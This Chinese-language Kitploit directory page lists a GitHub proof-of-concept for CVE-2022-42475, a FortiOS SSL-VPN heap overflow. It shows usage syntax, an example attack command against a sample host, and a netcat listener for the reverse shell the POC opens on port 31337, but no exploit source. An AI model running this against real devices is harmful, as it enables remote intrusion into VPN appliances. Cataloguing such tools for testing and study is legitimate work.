Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2022-42475 — FortiOS 缓冲区溢出漏洞 | Kitploit
工具/GitHubGitHub/amir-hy/cve-2022-42475
漏洞分析漏洞利用渗透测试学习与教育二进制利用
GitHubamir-hy/cve-2022-42475

cve-2022-42475

FortiOS 缓冲区溢出漏洞

查看仓库
7113年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

FortiOS SSL-VPN 缓冲区溢出漏洞

cve-2022-42475

https://nvd.nist.gov/vuln/detail/CVE-2022-42475 用于利用 Fortinet 的 SSLVPN 守护进程中堆溢出的 POC 代码

说明

这是一个快速而粗糙的 POC,除非你极其幸运,否则很可能无法在任何地方工作。它依赖于版本,并包含一些硬编码的偏移量,这些偏移量很可能因系统而异。

使用方法

python3 cve-2022-42475.py 远程主机 远程端口 本地主机 '命令'

root@kitploit:~
python3 cve-2022-42475.py 192.168.10.1 8443 10.10.1.1 'ls -la /'

监听器

该 POC 使用一条 Python 命令在端口 31337 上设置反向 shell

root@kitploit:~
nc -lvnp 31337

免责声明

本项目仅供教育和道德测试之用。未经事先双方同意,使用此工具攻击目标是违法的。开发者不承担任何法律责任,并且不对因使用此工具造成的任何滥用或损害负责。

致谢

感谢 Alain M - Twitter : @plopz0r

下载工具